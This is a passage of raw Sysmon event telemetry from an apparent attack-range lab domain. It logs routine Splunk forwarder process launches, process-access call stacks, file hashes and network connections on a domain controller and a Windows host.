Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.981{466BC892-F678-60EB-9D7D-00000000CF01}7520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=373480021CAF188AF7EA8C390A8FC1A2,SHA256=991BE16F7456F55926B09291D3C81061BA26B570B426F3CB2A4CAF62A4016C4E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.580{466BC892-F678-60EB-9C7D-00000000CF01}96888376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8480FC5710A52915CE4958543A975844,SHA256=EF22A93C63906348B8A466627936AB40F500DE8A0EEDC634B6C5684B41CB3ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808945Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:52.643{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6F9D6DCEA012CC6FCFACB1532CB67A3,SHA256=687AA5AD2DED46CA2C387C26B5A90A2BCCCC46F3BA7EE3ADC8213AA580C7E685,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.311{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.296{466BC892-F678-60EB-9C7D-00000000CF01}9688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D57914224154CE3647C0D7BB38C31B4A,SHA256=FC115FD537208E9A91C731051CDE316EF7ADFB89C8C312089D99E45097F36E77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:52.149{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9C9B91DD607933377C2B0241470B94CF,SHA256=B6F690379A4CBB480F9985646E92C4D1415DCC951EFD414462B13503D08DF50C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:53.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C05C0C3A60D94B6BD4FB04D0A01A12F2,SHA256=6954F516159D7D9761B5684AB7B2A76514B258AA7167B677CA018A54397A61CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:53.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4509BFE796388C2A66B631DD1AADFD48,SHA256=DCF942F8D099A891822A9D2386556B0072A932D77BBF652C29B75C2F767F5201,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.895{466BC892-F679-60EB-9E7D-00000000CF01}95809056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.680{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.664{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.665{466BC892-F679-60EB-9E7D-00000000CF01}9580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:53.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1DCD0E76720DE2DB1F62E1990AF3EB4,SHA256=740329F8B7FF18BD018ED16194F198F83F5E2D68D842A70417C223657B532F91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:54.726{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1A510A9F05661317D86E3321D22BC97,SHA256=0B90AB6B9AF9783B07B67476E3BFB3707A306F02DFA7B05B9C4B11E54D83B72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.534{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A638B8C7E4F12AB0763883CA66CEE62,SHA256=795AECCE905D085B56AE8BAF0B94CF5B3B7A3DDE19F47FAD06843FFB4A4661E0,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:53.118{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-45063-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000808947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:52.369{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57362-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:54.365{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F67A-60EB-9F7D-00000000CF01}5260C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:59:54.365{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 